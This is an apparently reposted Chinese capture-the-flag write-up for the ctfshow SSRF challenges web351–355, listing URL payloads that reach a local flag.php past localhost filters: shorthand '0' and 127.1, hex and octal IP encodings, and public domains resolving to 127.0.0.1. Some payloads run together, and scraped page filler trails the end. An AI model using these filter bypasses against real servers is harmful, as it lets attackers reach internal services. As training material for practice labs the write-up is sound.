1.WEB351 尝试访问本机的flag.PHP payload: url=Http://localhost/flag.phpurl=http://127.0.0.1/flag.php 2.web3
尝试访问本机的flag.PHP
payload:
url=Http://localhost/flag.phpurl=http://127.0.0.1/flag.php
必须要用http或https,ip没有过滤因为匹配时没加变量,恒为真
payload:
url=http://127.0.0.1/flag.phpurl=http://localhost/flag.php
必须要用http或https,过滤了127.0.,只要匹配到了127.0.就不能继续执行了
windows 0代表0.0.0.0
linux 0代表 127.0.0.1
可以用0代替127.0.0.1
payload:
url=http://0/flag.php #特殊0绕过url=http://0.0.0.0/flag.php #特殊0绕过url=url=http://0x7F000001/flag.php #进制绕过http://0177.0.0.1/flag.php #进制绕过http://127.1/flag.php #简写绕过
过滤了0和1,可以把域名解析到127.0.0.1
http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
http://sudo.cc/
url=http://sudo.cc/flag.php
对ip长度做了限制
payload:
url=http://0/flag.phpurl=http://127.1/flag.php
参考文章:
ssrf
来源地址:https://blog.csdn.net/m0_62207170/article/details/130574168
--结束END--
本文标题: ctfshow web入门 ssrf web351-355
本文链接: https://lsjlt.com/news/398250.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0